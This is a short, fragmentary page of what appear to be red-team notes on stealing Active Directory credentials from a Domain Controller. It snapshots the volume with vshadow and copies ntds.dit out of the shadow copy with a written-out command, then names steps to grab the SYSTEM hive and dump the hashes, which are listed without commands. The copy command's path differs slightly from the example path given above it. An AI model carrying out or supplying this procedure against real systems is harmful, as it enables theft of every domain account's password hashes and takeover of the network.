Shadow Copies
Use the MS signed vshadow tool to take a snapshot of the Domain Controller
Find the Shadow copy device name
Could look something like this \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
Make a new NTDS.dit
copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
Grab the system hive
Dump NTDS.dit locally
Last updated